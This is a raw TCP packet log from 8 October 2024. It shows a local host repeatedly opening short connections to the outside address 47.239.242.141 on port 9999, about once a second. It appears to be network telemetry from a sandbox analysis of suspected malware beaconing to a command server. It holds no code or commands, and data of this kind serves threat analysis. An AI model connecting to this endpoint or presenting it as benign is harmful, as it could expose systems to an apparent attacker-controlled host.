Oct 8, 2024 04:20:58.043200970 CEST	9999	54331	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:58.043260098 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.043282986 CEST	9999	54331	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:58.043322086 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.043441057 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.048194885 CEST	9999	54331	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:58.156335115 CEST	54332	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.161286116 CEST	9999	54332	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:58.161415100 CEST	54332	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.161453009 CEST	54332	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:58.166243076 CEST	9999	54332	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:59.053307056 CEST	9999	54332	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:59.053325891 CEST	9999	54332	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:59.053607941 CEST	54332	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:59.053607941 CEST	54332	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:59.058530092 CEST	9999	54332	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:59.171421051 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:59.176428080 CEST	9999	54333	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:59.176963091 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:59.180902004 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:59.185765028 CEST	9999	54333	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:00.072031975 CEST	9999	54333	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:00.072051048 CEST	9999	54333	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:00.072082996 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.072118998 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.072221041 CEST	54333	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.076935053 CEST	9999	54333	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:00.187093019 CEST	54334	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.192049980 CEST	9999	54334	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:00.192115068 CEST	54334	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.192292929 CEST	54334	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:00.197035074 CEST	9999	54334	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:01.113792896 CEST	9999	54334	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:01.113807917 CEST	9999	54334	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:01.117037058 CEST	54334	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:01.117038012 CEST	54334	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:01.121898890 CEST	9999	54334	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:01.235249996 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:01.240343094 CEST	9999	54335	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:01.243838072 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:01.243838072 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:01.249136925 CEST	9999	54335	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:02.144619942 CEST	9999	54335	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:02.144689083 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.144746065 CEST	9999	54335	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:02.144790888 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.144906998 CEST	54335	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.149652958 CEST	9999	54335	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:02.252475977 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.257360935 CEST	9999	54336	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:02.257433891 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.259332895 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:02.264177084 CEST	9999	54336	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:03.188548088 CEST	9999	54336	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:03.188596964 CEST	9999	54336	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:03.188730001 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.188730955 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.188908100 CEST	54336	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.193685055 CEST	9999	54336	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:03.296215057 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.301305056 CEST	9999	54337	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:03.303423882 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.303472996 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:03.308360100 CEST	9999	54337	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:04.204377890 CEST	9999	54337	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:04.204405069 CEST	9999	54337	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:04.204428911 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.204459906 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.204659939 CEST	54337	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.209391117 CEST	9999	54337	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:04.313935041 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.319899082 CEST	9999	54338	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:04.319968939 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.320166111 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:04.325978041 CEST	9999	54338	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:05.212778091 CEST	9999	54338	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:05.214066982 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.241415977 CEST	9999	54338	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:05.243359089 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.336920977 CEST	54338	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.336930990 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.341864109 CEST	9999	54338	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:05.341886997 CEST	9999	54339	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:05.342006922 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.342331886 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:05.347135067 CEST	9999	54339	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:06.269792080 CEST	9999	54339	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:06.269870043 CEST	9999	54339	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:06.269961119 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.269962072 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.269962072 CEST	54339	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.274866104 CEST	9999	54339	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:06.375499964 CEST	54340	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.380450010 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:06.380630016 CEST	54340	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.380721092 CEST	54340	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:06.385471106 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.376259089 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.376281023 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.376295090 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.377058983 CEST	54340	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:07.385062933 CEST	54340	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:07.389935017 CEST	9999	54340	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.500916958 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:07.506011009 CEST	9999	54341	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:07.510016918 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:07.510016918 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:07.514874935 CEST	9999	54341	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:08.433435917 CEST	9999	54341	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:08.433504105 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.433542013 CEST	9999	54341	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:08.433581114 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.433662891 CEST	54341	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.438401937 CEST	9999	54341	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:08.546864986 CEST	54342	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.551670074 CEST	9999	54342	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:08.551729918 CEST	54342	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.551886082 CEST	54342	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:08.556653023 CEST	9999	54342	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:09.475200891 CEST	9999	54342	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:09.475223064 CEST	9999	54342	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:09.477066994 CEST	54342	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:09.477066994 CEST	54342	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:09.481885910 CEST	9999	54342	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:09.595479012 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:09.600461960 CEST	9999	54343	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:09.600965977 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:09.604908943 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:09.609672070 CEST	9999	54343	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:10.516036034 CEST	9999	54343	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:10.516089916 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.516303062 CEST	9999	54343	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:10.516347885 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.625376940 CEST	54343	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.625703096 CEST	54344	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.630302906 CEST	9999	54343	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:10.630456924 CEST	9999	54344	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:10.630506039 CEST	54344	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.630623102 CEST	54344	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:10.635401964 CEST	9999	54344	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:11.516216040 CEST	9999	54344	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:11.516285896 CEST	9999	54344	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:11.516757011 CEST	54344	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:11.517008066 CEST	54344	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:11.521703959 CEST	9999	54344	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:11.624274969 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:11.629324913 CEST	9999	54345	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:11.633119106 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:11.633320093 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:11.638138056 CEST	9999	54345	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:12.546214104 CEST	9999	54345	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:12.546228886 CEST	9999	54345	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:12.546302080 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.546302080 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.546473026 CEST	54345	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.551193953 CEST	9999	54345	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:12.657880068 CEST	54346	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.662838936 CEST	9999	54346	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:12.662916899 CEST	54346	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.663175106 CEST	54346	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:12.667952061 CEST	9999	54346	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:13.557485104 CEST	9999	54346	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:13.557507992 CEST	9999	54346	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:13.561152935 CEST	54346	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:13.561153889 CEST	54346	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:13.566091061 CEST	9999	54346	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:13.675040007 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:13.679884911 CEST	9999	54347	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:13.683408976 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:13.683408976 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:13.688220024 CEST	9999	54347	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:14.570394993 CEST	9999	54347	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:14.570431948 CEST	9999	54347	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:14.570457935 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.570476055 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.570658922 CEST	54347	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.575359106 CEST	9999	54347	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:14.687434912 CEST	54348	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.692361116 CEST	9999	54348	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:14.692429066 CEST	54348	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.692572117 CEST	54348	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:14.697341919 CEST	9999	54348	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:15.586369991 CEST	9999	54348	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:15.586389065 CEST	9999	54348	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:15.589154959 CEST	54348	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:15.589154959 CEST	54348	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:15.594060898 CEST	9999	54348	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:15.705075979 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:15.710064888 CEST	9999	54349	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:15.713222980 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:15.713223934 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:15.718111038 CEST	9999	54349	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:16.631016016 CEST	9999	54349	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:16.631040096 CEST	9999	54349	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:16.631105900 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.631107092 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.631197929 CEST	54349	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.636049986 CEST	9999	54349	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:16.737859011 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.742964983 CEST	9999	54350	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:16.743048906 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.744858027 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:16.751092911 CEST	9999	54350	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:17.666732073 CEST	9999	54350	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:17.666754007 CEST	9999	54350	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:17.666946888 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.666946888 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.667129040 CEST	54350	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.672832012 CEST	9999	54350	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:17.780827045 CEST	54351	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.786835909 CEST	9999	54351	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:17.786958933 CEST	54351	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.787441015 CEST	54351	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:17.793176889 CEST	9999	54351	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:18.680684090 CEST	9999	54351	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:18.680707932 CEST	9999	54351	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:18.680857897 CEST	54351	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:18.680932045 CEST	54351	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:18.685883045 CEST	9999	54351	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:18.797312021 CEST	54352	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:18.802364111 CEST	9999	54352	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:18.802422047 CEST	54352	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:18.802515030 CEST	54352	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:18.807733059 CEST	9999	54352	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:19.725578070 CEST	9999	54352	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:19.725594997 CEST	9999	54352	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:19.725667000 CEST	54352	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:19.726207018 CEST	54352	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:19.731050014 CEST	9999	54352	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:19.843501091 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:19.848643064 CEST	9999	54353	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:19.851357937 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:19.851485968 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:19.856348991 CEST	9999	54353	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:20.756114006 CEST	9999	54353	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:20.756201982 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.756275892 CEST	9999	54353	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:20.756325960 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.875379086 CEST	54353	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.875513077 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.880374908 CEST	9999	54353	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:20.880386114 CEST	9999	54354	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:20.881248951 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.881249905 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:20.886615038 CEST	9999	54354	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:21.787461996 CEST	9999	54354	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:21.787486076 CEST	9999	54354	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:21.787556887 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.787638903 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.787698984 CEST	54354	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.792593956 CEST	9999	54354	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:21.917304993 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.922405958 CEST	9999	54355	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:21.922471046 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.923907995 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:21.928741932 CEST	9999	54355	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:22.846201897 CEST	9999	54355	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:22.846256971 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.846457005 CEST	9999	54355	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:22.846496105 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.956993103 CEST	54355	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.959481001 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.961880922 CEST	9999	54355	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:22.964318991 CEST	9999	54356	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:22.965037107 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.966972113 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:22.971750021 CEST	9999	54356	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:23.867352962 CEST	9999	54356	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:23.867500067 CEST	9999	54356	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:23.867551088 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.875004053 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.986088037 CEST	54356	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.986663103 CEST	54357	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.991123915 CEST	9999	54356	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:23.991504908 CEST	9999	54357	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:23.991588116 CEST	54357	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.991787910 CEST	54357	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:23.996572018 CEST	9999	54357	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:24.912466049 CEST	9999	54357	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:24.912478924 CEST	9999	54357	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:24.917082071 CEST	54357	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:24.917083025 CEST	54357	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:24.922178030 CEST	9999	54357	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:25.033080101 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:25.038603067 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:25.038719893 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:25.041091919 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:25.045989037 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.602613926 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.602627993 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.602634907 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.602793932 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.602794886 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.602860928 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.602875948 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.602899075 CEST	54358	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.607686996 CEST	9999	54358	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.718135118 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.723629951 CEST	9999	54359	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:26.723690033 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.723853111 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:26.728668928 CEST	9999	54359	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:27.626897097 CEST	9999	54359	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:27.626910925 CEST	9999	54359	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:27.626952887 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.627001047 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.627062082 CEST	54359	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.631794930 CEST	9999	54359	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:27.735312939 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.740243912 CEST	9999	54360	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:27.743464947 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.743464947 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:27.748373032 CEST	9999	54360	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:28.650034904 CEST	9999	54360	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:28.650072098 CEST	9999	54360	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:28.650140047 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.650140047 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.650263071 CEST	54360	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.655070066 CEST	9999	54360	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:28.807585955 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.812618017 CEST	9999	54361	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:28.813157082 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.813273907 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:28.818037987 CEST	9999	54361	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:29.718110085 CEST	9999	54361	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:29.718164921 CEST	9999	54361	47.239.242.141	192.168.2.4
